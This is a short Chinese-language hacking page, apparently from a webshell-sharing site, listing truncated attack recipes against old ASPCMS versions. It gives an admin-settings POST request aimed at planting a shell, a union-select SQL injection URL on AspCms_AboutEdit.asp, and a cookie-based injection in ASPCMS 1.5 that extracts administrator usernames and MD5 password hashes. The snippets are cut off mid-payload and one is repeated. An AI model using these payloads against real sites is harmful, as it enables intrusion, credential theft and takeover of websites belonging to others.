ASPCMS 老版本秒杀拿SHELL
老的ASPCMS版本的秒杀拿SHELL漏洞 找到后台。。。然后 /admin/_system/AspCms_SiteSetting.asp?action=saves 直接POST runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&S...
老的ASPCMS版本的秒杀拿SHELL漏洞 找到后台。。。然后 /admin/_system/AspCms_SiteSetting.asp?action=saves 直接POST runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&S...
后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗! ————————后台注射———————— https://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,l...
Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值 在后面加上注入语句: UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins 然后编辑帐号就能看到管理员的帐号和MD5密码值。 后...